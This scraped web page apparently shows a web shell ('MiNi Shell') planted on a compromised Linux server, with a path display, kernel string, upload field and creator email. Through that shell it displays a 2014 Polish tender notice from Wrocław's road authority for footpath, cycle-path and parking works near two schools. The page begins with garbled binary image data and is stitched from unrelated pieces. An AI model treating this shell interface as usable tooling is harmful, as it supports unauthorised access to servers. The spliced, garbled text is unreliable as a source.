JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140403/72505-N-2014.html

<p class="kh_header"><b>Wrocław: zadanie 1 - budowa ciągu pieszo - rowerowego wraz z oświetleniem na odcinku od ul. Zabrodzkiej do ul. Wałbrzyskiej - dojście do Szkoły Podstawowej Nr 42 przy ul. Wałbrzyskiej 50 we Wrocławiu wraz z opracowaniem dokumentacji projektowej;
zadanie 2 - budowa chodnika i zatok postojowych przy Szkole Podstawowej  Nr 17 przy ul. Wieczystej 105 we Wrocławiu wraz z opracowaniem dokumentacji projektowej</b><br>
<b>Numer ogłoszenia: 72505 - 2014; data zamieszczenia: 03.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Utrzymania Miasta , ul. Długa 49, 53-633 Wrocław, woj. dolnośląskie, tel. 0-71 3559076, faks 0-71 3734906, 3550866.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wzp.zdium.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zadanie 1 - budowa ciągu pieszo - rowerowego wraz z oświetleniem na odcinku od ul. Zabrodzkiej do ul. Wałbrzyskiej - dojście do Szkoły Podstawowej Nr 42 przy ul. Wałbrzyskiej 50 we Wrocławiu wraz z opracowaniem dokumentacji projektowej;
zadanie 2 - budowa chodnika i zatok postojowych przy Szkole Podstawowej  Nr 17 przy ul. Wieczystej 105 we Wrocławiu wraz z opracowaniem dokumentacji projektowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
zadanie 1 - budowa ciągu pieszo - rowerowego wraz z oświetleniem na odcinku od ul. Zabrodzkiej do ul. Wałbrzyskiej - dojście do Szkoły Podstawowej  Nr 42 przy ul. Wałbrzyskiej 50 we Wrocławiu wraz z opracowaniem dokumentacji projektowej;
zadanie 2 - budowa chodnika i zatok postojowych przy Szkole Podstawowej           Nr 17 przy ul. Wieczystej 105 we Wrocławiu wraz z opracowaniem dokumentacji projektowej 
2.Zakres zamówienia obejmuje:
zadanie 1 - budowa ciągu pieszo - rowerowego wraz z oświetleniem na odcinku od ul. Zabrodzkiej do ul. Wałbrzyskiej - dojście do Szkoły Podstawowej Nr 42 przy ul. Wałbrzyskiej 50 we Wrocławiu wraz z opracowaniem dokumentacji projektowej
2.1 Opracowanie dokumentacji projektowej:
a) projekt budowlany - projekt zagospodarowania terenu
b) projekt wykonawczy:
- część drogowa,
- oświetlenie drogowe,
- montaż stojaków rowerowych ze szczegółowym domiarem lokalizacji,
- projekt odtworzenia nawierzchni /dla stojaków rowerowych/,
- organizacja ruchu zastępczego,
- organizacja ruchu docelowego.
c) opracowania inne:
- organizacja, utrzymanie i likwidacja zaplecza budowy oraz terenu na składowanie
materiałów wraz z zasilaniem w energię elektryczną i doprowadzeniem wody,
- zabezpieczenie poziomej osnowy geodezyjnej,
- uzupełniające pomiary geodezyjne,
- specyfikacje techniczne wykonania i odbioru robót,
- harmonogram rzeczowo - finansowy wykonania robót, 
d) uzyskanie niezbędnych materiałów, uzgodnień, opinii i decyzji do realizacji zamówienia.
2.2 Pełnienie nadzoru autorskiego w zakresie opracowanej dokumentacji projektowej na czas budowy.
2.3 Realizacja zadania w oparciu o przygotowaną i uzgodnioną dokumentację projektową zgodnie z pkt. 2.1.
Przewidywany zakres robót do wykonania obejmuje wykonanie ciągu pieszo - rowerowego o nawierzchni bitumicznej i podbudowie z kruszywa łamanego i warstwie stabilizacji, wybudowaniu oświetlenia wraz z przyłączem rozebranie istniejącej nawierzchni przy przejściu dla pieszych na ul. Wałbrzyskiej (płyty budowlane i kostka chodnikowa betonowa), wykonanie chodnika z kostki betonowej przy przejściu dla pieszych na ul. Wałbrzyskiej nawiązując do istniejącego chodnika na ul Wałbrzyskiej, ułożenie na przejściach dla pieszych płytek typu STOP,  regulacja studni telekomunikacyjnych, montaż słupków wygrodzeniowych, demontaż i przestawienie istniejących stojaków rowerowych przy szkole oraz montaż nowych stojaków rowerowych typu odwrócona litera U wraz z odbudową nawierzchni.
zadanie 2 - budowa chodnika i zatok postojowych przy Szkole Podstawowej           Nr 17 przy ul. Wieczystej 105 we Wrocławiu wraz z opracowaniem dokumentacji projektowej 
2.4 Opracowanie dokumentacji projektowej:
a) projekt wykonawczy:
- część drogowa,
- oświetlenie drogowe,
- zieleń,
- organizacja ruchu zastępczego,
- organizacja ruchu docelowego,
b) opracowania inne:
- organizacja, utrzymanie i likwidacja zaplecza budowy oraz terenu na składowanie
materiałów wraz z zasilaniem w energię elektryczną i doprowadzeniem wody,
- zabezpieczenie poziomej osnowy geodezyjnej,
- uzupełniające pomiary geodezyjne,
- specyfikacje techniczne wykonania i odbioru robót,
- harmonogram rzeczowo - finansowy wykonania robót, 
c) uzyskanie niezbędnych materiałów, uzgodnień, opinii i decyzji do realizacji zamówienia.
2.5 Pełnienie nadzoru autorskiego w zakresie opracowanej dokumentacji projektowej na czas budowy.
2.6 Realizacja zadania w oparciu o przygotowaną i uzgodnioną dokumentację projektową zgodnie z pkt. 2.4.
Przewidywany do wykonania zakres robót będzie polegał na ułożeniu chodnika z płytek betonowych wzdłuż ogrodzenia terenu szkoły i boiska oraz parkingu gruntowego Spółdzielni Mieszkaniowej, wykonaniu na przyległym terenie zatok postojowych z płyt ażurowych typu MEBA, doświetleniu terenu chodnika i zatok postojowych, obsianiu terenu trawą i wykonaniu miejscowych nasadzeń, regulacji wysokościowej skrzynek i pokryw urządzeń uzbrojenia podziemnego wod., gaz. i telekomunik., wykonaniu organizacji ruchu zastępczego i docelowego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie 1 - 2.500 zł
Zadanie 2 - 3.000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1. Posiadają niezbędną wiedzę i doświadczenie, tj.:
a) wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie obejmujące budowę, przebudowę lub remont ciągu pieszo - rowerowego lub drogi klasy minimum D  o nawierzchni bitumicznej dla zadania 1.
b) wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie obejmujące  budowę, przebudowę lub remont chodnika o nawierzchni z kostek lub płytek betonowych wraz z organizacją ruchu zastępczego i docelowego dla zadania 2. 
Wykonawca może polegać na wiedzy i doświadczeniu innych popdmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków.
W przypadku, gdy wykonawcy będą ubiegać się wspólnie o udzielenie zamówienia, muszą spełnić:warunek 1 - dowolny wykonawca lub wykonawcy łącznie. 
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie     spełnia / nie spełnia.
Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nieposiadająca osobowości prawnej albo podmioty te występujące wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1. Dysponują osobami zdolnymi do wykonania zamówienia tj.  
kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami drogowymi i przynależy do Okręgowej Izby Inżynierów Budownictwa.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W przypadku, gdy wykonawcy będą ubiegać się wspólnie o udzielenie zamówienia, muszą spełnić:
warunek 1 - dowolny wykonawca. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia /nie spełnia.
Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nieposiadająca osobowości prawnej albo podmioty te występujące wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy, jeżeli konieczność wprowadzenia zmian wynikać będzie z regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmian umowy, wraz ze skutkami wprowadzenia takich zmian lub okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, przy czym zmiany postanowień umowy dotyczyć mogą w szczególności:
1)terminu realizowania umowy,
2)sposobu wykonywania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, jeżeli zmiana spowodowana będzie okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, tj. warunki faktyczne na terenie budowy wpłyną na zakres lub sposób wykonywania przedmiotu umowy,
3)formy lub terminu zwrotu zabezpieczenia należytego wykonania umowy,
4)oznaczenia danych dotyczących Zamawiającego lub Wykonawcy,
5)zmiany sposobu płatności,
6)zmiany zakresu części zamówienia powierzonej Podwykonawcom, zmiany Podwykonawcy lub wprowadzenia nowego Podwykonawcy.
2.Zmiany postanowień umownych zakwalifikowane przez strony jako nieistotne, mogą być wprowadzone do umowy w każdym czasie.
3.Wprowadzenie zmian, o których mowa w ust. 1 i 2, do umowy wymaga aneksu sporządzonego w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wzp.zdium.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Utrzymania Miasta, ul. Długa 49, 53-633 Wrocław, bud. B, pok. nr 2, osoba uprawniona do kontaktów: Anna Nowak-Kiezik, tel. 71 37 60 710.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2014 godzina 09:30, miejsce: Zarząd Dróg i Utrzymania Miasta, ul. Długa 49, 53-633 Wrocław, bud. B, pok. nr 1 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie 1 - budowa ciągu pieszo - rowerowego wraz z oświetleniem na odcinku od ul. Zabrodzkiej do ul. Wałbrzyskiej - dojście do Szkoły Podstawowej Nr 42 przy ul. Wałbrzyskiej 50 we Wrocławiu wraz z opracowaniem dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje:
1.1 Opracowanie dokumentacji projektowej:
a) projekt budowlany - projekt zagospodarowania terenu
b) projekt wykonawczy:
- część drogowa,
- oświetlenie drogowe,
- montaż stojaków rowerowych ze szczegółowym domiarem lokalizacji,
- projekt odtworzenia nawierzchni /dla stojaków rowerowych/,
- organizacja ruchu zastępczego,
- organizacja ruchu docelowego.
c) opracowania inne:
- organizacja, utrzymanie i likwidacja zaplecza budowy oraz terenu na składowanie
materiałów wraz z zasilaniem w energię elektryczną i doprowadzeniem wody,
- zabezpieczenie poziomej osnowy geodezyjnej,
- uzupełniające pomiary geodezyjne,
- specyfikacje techniczne wykonania i odbioru robót,
- harmonogram rzeczowo - finansowy wykonania robót, 
d) uzyskanie niezbędnych materiałów, uzgodnień, opinii i decyzji do realizacji zamówienia.
1.2 Pełnienie nadzoru autorskiego w zakresie opracowanej dokumentacji projektowej na czas budowy.
1.3 Realizacja zadania w oparciu o przygotowaną i uzgodnioną dokumentację projektową zgodnie z pkt. 1.1.
Przewidywany zakres robót do wykonania obejmuje wykonanie ciągu pieszo - rowerowego o nawierzchni bitumicznej i podbudowie z kruszywa łamanego i warstwie stabilizacji, wybudowaniu oświetlenia wraz z przyłączem rozebranie istniejącej nawierzchni przy przejściu dla pieszych na ul. Wałbrzyskiej (płyty budowlane i kostka chodnikowa betonowa), wykonanie chodnika z kostki betonowej przy przejściu dla pieszych na ul. Wałbrzyskiej nawiązując do istniejącego chodnika na ul Wałbrzyskiej, ułożenie na przejściach dla pieszych płytek typu STOP,  regulacja studni telekomunikacyjnych, montaż słupków wygrodzeniowych, demontaż i przestawienie istniejących stojaków rowerowych przy szkole oraz montaż nowych stojaków rowerowych typu odwrócona litera U wraz z odbudową nawierzchni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2 - budowa chodnika i zatok postojowych przy Szkole Podstawowej Nr 17 przy ul. Wieczystej 105 we Wrocławiu wraz z opracowaniem dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje:
1.1 Opracowanie dokumentacji projektowej:
a) projekt wykonawczy:
- część drogowa,
- oświetlenie drogowe,
- zieleń,
- organizacja ruchu zastępczego,
- organizacja ruchu docelowego,
b) opracowania inne:
- organizacja, utrzymanie i likwidacja zaplecza budowy oraz terenu na składowanie
materiałów wraz z zasilaniem w energię elektryczną i doprowadzeniem wody,
- zabezpieczenie poziomej osnowy geodezyjnej,
- uzupełniające pomiary geodezyjne,
- specyfikacje techniczne wykonania i odbioru robót,
- harmonogram rzeczowo - finansowy wykonania robót, 
c) uzyskanie niezbędnych materiałów, uzgodnień, opinii i decyzji do realizacji zamówienia.
1.2 Pełnienie nadzoru autorskiego w zakresie opracowanej dokumentacji projektowej na czas budowy.
1.3 Realizacja zadania w oparciu o przygotowaną i uzgodnioną dokumentację projektową zgodnie z pkt. 1.1.
Przewidywany do wykonania zakres robót będzie polegał na ułożeniu chodnika z płytek betonowych wzdłuż ogrodzenia terenu szkoły i boiska oraz parkingu gruntowego Spółdzielni Mieszkaniowej, wykonaniu na przyległym terenie zatok postojowych z płyt ażurowych typu MEBA, doświetleniu terenu chodnika i zatok postojowych, obsianiu terenu trawą i wykonaniu miejscowych nasadzeń, regulacji wysokościowej skrzynek i pokryw urządzeń uzbrojenia podziemnego wod., gaz. i telekomunik., wykonaniu organizacji ruchu zastępczego i docelowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com